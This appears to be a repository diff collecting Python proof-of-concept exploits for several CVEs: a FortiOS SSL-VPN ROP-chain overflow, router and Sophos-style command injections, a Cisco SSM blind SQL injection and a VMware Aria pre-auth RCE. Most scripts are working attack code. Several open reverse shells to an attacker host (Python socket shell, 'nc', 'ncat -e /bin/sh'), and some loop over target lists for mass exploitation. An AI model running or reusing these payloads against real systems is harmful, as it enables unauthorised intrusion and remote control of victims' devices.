CVE-2023-poc

CVE-2022-42475-RCE-POC.py

@@ -0,0 +1,79 @@
+import socket
+import ssl
+from pwn import *
+import time
+import sys
+import requests
+
+context = ssl.SSLContext()
+target_host = sys.argv[1]
+target_port = sys.argv[2]
+reverse = sys.argv[3]
+params = sys.argv[4].split(" ")
+strparams = "["
+for param in params:
+    strparams += "'"+param+"',"
+strparams = strparams[:-1]
+strparams += "]"
+
+
+#binary functions
+execve = p64(0x0042e050)
+
+#binary gadgets
+movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
+poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
+poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
+jmprax = p64(0x0000000000433181)#: jmp rax)
+pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
+poprax = p64(0x00000000004359af)# : pop rax ; ret)
+gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
+poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
+rax3 = gadget1
+
+
+
+#hardcoded value which would probably need to be bruteforced or leaked
+hardcoded = 0x00007fc5f128e000
+
+scbase = p64(hardcoded)
+rdi = p64(hardcoded + 0xc48)
+cmd = p64(hardcoded + 0xd38)
+asdf = hardcoded + 0xd38
+cmd1 = p64(asdf)
+cmd2 = p64(asdf+16)
+arg1 = p64(asdf+48)
+arg2 = p64(asdf+56)
+arg3 = p64(asdf+64)
+
+ropchain = poprax
+ropchain += execve
+ropchain += poprdi
+ropchain += cmd1
+ropchain += poprsi
+ropchain += cmd2
+ropchain += poprdx
+ropchain += p64(0)
+ropchain += jmprax
+ropchain += b"/bin/python\x00\x00\x00\x00\x00"
+ropchain += arg1
+ropchain += arg2
+ropchain += arg3
+ropchain += p64(0)
+ropchain += b"python\x00\x00"
+ropchain += b"-c\x00\x00\x00\x00\x00\x00"
+ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""
+
+
+
+try:
+    with socket.create_connection((target_host, int(target_port,10))) as sock:
+        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
+            ssock.settimeout(2)
+            context.verify_mode = ssl.CERT_NONE
+            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
+            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
+            ssock.sendall(tosend)
+            r = ssock.recv(10024)
+except Exception as e:
+    print("Exception occurred :"+ repr(e))

CVE-2023-0861.py

@@ -0,0 +1,31 @@
+import re
+import requests
+import argparse
+import urllib.parse
+
+
+parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC')
+parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router')
+parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication')
+parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload')
+args = parser.parse_args()
+
+url = f'{args.url}/admin/gnss.php'
+c = {'PHPSESSID':args.phpsessid}
+response = requests.get(url,cookies=c)
+csrf_token = re.search(r'<input type="hidden" name="csrf-token" value="([^"]+)">', response.text).group(1)
+#print(csrf_token)
+data = {
+'toggleAlignment': 'test',
+'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2',
+'csrf-token': csrf_token,
+}
+#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2')
+url = f'{args.url}/admin/gnssAutoAlign.php'
+
+response = requests.post(url, data=data,cookies=c)
+
+if response.status_code == 200:
+    results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c)
+    #print('done!')
+    print(results.content.decode())

CVE-2023-1671-POC.py

@@ -0,0 +1,75 @@
+import argparse
+import time
+import requests
+import base64
+
+def dnslog_getdomain(session):
+    url = 'http://www.dnslog.cn/getdomain.php?t=0'
+    try:
+        res = session.get(url, verify=False, timeout=60)
+        return res.text
+    except:
+        print(f"[x] {url} --> DNSlog platform --> Request error.")
+
+def dnslog_getrecords(session, target_url, domain, count):
+    url = 'http://www.dnslog.cn/getrecords.php?t=0'
+    try:
+        resp = session.get(url, verify=False, timeout=60)
+        if domain in resp.text:
+            if count == 0:
+                print(f"[++++++] {target_url} --> vulnerable!")
+                with open("CVE-2023-1671-vulnerable-urls.txt", 'a+', encoding="utf-8") as f:
+                    f.write(target_url + "\n")
+            else:
+                print(f"[++++++] {target_url} --> vulnerable!")
+                with open("CVE-2023-1671-vulnerable-urls.txt", 'a+', encoding="utf-8") as f:
+                    f.write(target_url + "\n")
+        else:
+            print(f"[x] {target_url} --> unvulnerable.")
+    except:
+        print(f"[x] {target_url} --> Request error.")
+
+def exploit(target_url, domain, session):
+    try:
+        url = f"{target_url}/index.php?c=blocked&action=continue"
+        headers = {
+            "Content-Type": "application/x-www-form-urlencoded",
+            "User-Agent": "curl/8.0.1"
+        }
+        user_encoded = base64.b64encode(f"';ping {domain} -c 3 #".encode()).decode().replace("=", "")
+        data = f"args_reason=filetypewarn&url=16625&filetype=5831&user=4525&user_encoded={user_encoded}"
+        session.post(url, data=data, headers=headers, verify=False, timeout=60)
+    except requests.exceptions.ProxyError:
+        print(f"[x] {target_url} --> Proxy error.")
+    except Exception as e:
+        print(f"[x] {target_url} --> Unknown error.Error message: {e}")
+
+def main(target_url, dnslog_url, file):
+    session = requests.session()
+    count = 0
+    if target_url and dnslog_url:
+        status_code = exploit(target_url, dnslog_url, session)
+        if status_code == 200:
+            print(f'[+] {target_url} --> The response value is {status_code}, please check the dnslog information by your')
+    elif target_url:
+        session = requests.session()
+        domain = dnslog_getdomain(session)
+        exploit(target_url, domain, session)
+        dnslog_getrecords(session, target_url, domain, count)
+    elif file:
+        for url in file:
+            count += 1
+            target_url = url.replace('\n', '')
+            session = requests.session()
+            domain = dnslog_getdomain(session)
+            time.sleep(1)
+            exploit(target_url, domain, session)
+            dnslog_getrecords(session, target_url, domain, count)
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Exploit script')
+    parser.add_argument('-u', '--url', type=str, required=True, help='Target URL, like: http://wwww.example.com')
+    parser.add_argument('-d', '--dnslog', type=str, required=False, help='DNSLog platform address')
+    parser.add_argument('-f', '--file', type=str, required=False, help='Target file')
+    args = parser.parse_args()
+    main(args.url, args.dnslog, args.file)

CVE-2023-1671.py

@@ -0,0 +1,45 @@
+import requests
+import random
+import base64
+import socket
+import time
+
+url_file = 'urls.txt'
+
+def exploit(host):
+    payload = f"$(echo -n \"';nc x.x.x.x 6969 #'\" | base64)"
+    data = {
+        'args_reason': 'filetypewarn',
+        'url': ''.join(random.choices(string.ascii_lowercase + string.digits, k=10)),
+        'filetype': ''.join(random.choices(string.ascii_lowercase + string.digits, k=10)),
+        'user': ''.join(random.choices(string.ascii_lowercase + string.digits, k=10)),
+        'user_encoded': payload
+    }
+
+    headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent': 'curl/8.0.1"
+
+    }
+
+    try:
+        response = requests.post(f'https://{host}/index.php?c=blocked&action=continue', headers=headers, data=data, verify=False, timeout=30)
+        if response.status_code == 200:
+            print(f'Host {host} has been exploited')
+        else:
+            print(f'Exploit unsuccessful on host {host}, status code {response.status_code}')
+    except requests.exceptions.Timeout:
+        print(f'Timeout on host {host}, moving on to next host')
+    except requests.exceptions.RequestException as e:
+        print(f'Error on host {host}: {e}')
+
+def main():
+    with open(url_file, 'r') as f:
+        for line in f:
+            host = line.strip()
+            print(f'Exploiting host {host}')
+            exploit(host)
+            time.sleep(1)
+
+if __name__ == '__main__':
+    main()

CVE-2023-20110.py

@@ -0,0 +1,47 @@
+"""
+Smart Software Manager On-Prem Release 8-202212 - Authenticated SQL Injection in 'filter_by' parameter
+Download link: https://software.cisco.com/download/home/286285506/type/286326948/release/8-202212
+
+Usage:
+1. Update host and cookies variables,
+2. Run `python3 exploit.py`
+
+Tested on Ubuntu 22.04.1 LTS, Python 3.10.6
+
+by redfr0g@stmcyber 2023
+"""
+
+import requests
+import string
+import warnings
+
+# script parameters, update accoridingly
+host = "<IP>:8443"
+cookies = {"_lic_engine_session": "<COOKIE>", "XSRF-TOKEN": "<CSRFTOKEN>"}
+
+
+url = "https://" + host + "/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'P%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10"
+headers = {"Accept": "application/json", "Content-Type": "application/json"}
+chars = string.printable[0:95]
+result = []
+search = True
+
+print("[+] Cisco Smart Software Manager Release 8-202212 SQL Injection PoC")
+print("[+] Starting DBMS banner enumeration...")
+
+# do error based sql injection until no match found
+while search:
+    for char in chars:
+        url = "https://" + host + "/backend/notifications/search_account_notifications.json?filter_by=message_type))%20LIKE%20%27%25%27+OR+1+%3d+1/+(SELECT+CASE+WHEN+(select+version()+LIKE+'" + ''.join(result) + char + "%25')+THEN+0+ELSE+1+END)--%20&filter_val=a&offset=0&limit=10"
+        # disable invalid cert warnings
+        with warnings.catch_warnings():
+            warnings.simplefilter("ignore")
+            r = requests.get(url, headers=headers, cookies=cookies, verify=False)
+        if "PG::DivisionByZero" in r.text:
+            # update and print result
+            result.append(char)
+            print("[+] DBMS Banner: " + ''.join(result))
+            break
+        if char == " ":
+            # stop search if no match found
+            search = False

CVE-2023-20887.py

@@ -0,0 +1,61 @@
+"""
+VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE
+Version: 6.8.0.1666364233
+Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
+A root cause analysis of the vulnerability can be found on my blog:
+https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
+"""
+import warnings
+warnings.filterwarnings("ignore", category=DeprecationWarning)
+import requests
+from threading import Thread
+import argparse
+from telnetlib import Telnet
+import socket
+requests.packages.urllib3.disable_warnings()
+
+
+
+argparser = argparse.ArgumentParser()
+argparser.add_argument("--url", help="VRNI URL", required=True)
+argparser.add_argument("--attacker", help="Attacker listening IP:PORT (example: 192.168.1.10:1337)", required=True)
+
+args = argparser.parse_args()
+
+
+
+
+def handler():
+    print("(*) Starting handler")
+    t = Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind((args.attacker.split(":")[0],int(args.attacker.split(":")[1])))
+    s.listen(1)
+    conn, addr= s.accept()
+    print(f"(+) Received connection from {addr[0]}")
+    t.sock = conn
+    print("(+) pop thy shell! (it's ready)")
+    t.interact()
+
+def start_handler():
+    t = Thread(target=handler)
+    t.daemon = True
+    t.start()
+
+
+def exploit():
+    url = args.url + "/saas./resttosaasservlet"
+    revshell = f'ncat {args.attacker.split(":")[0]} {args.attacker.split(":")[1]} -e /bin/sh'
+    payload = """[1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`"""+revshell+"""`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]"""
+    result = requests.post(url, headers={"Content-Type":"application/x-thrift"}, verify=False, data=payload)
+
+print("VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)")
+start_handler()
+exploit()
+
+try:
+    while True:
+        pass
+except KeyboardInterrupt:
+    print("(*) Exiting...")
+    exit(0)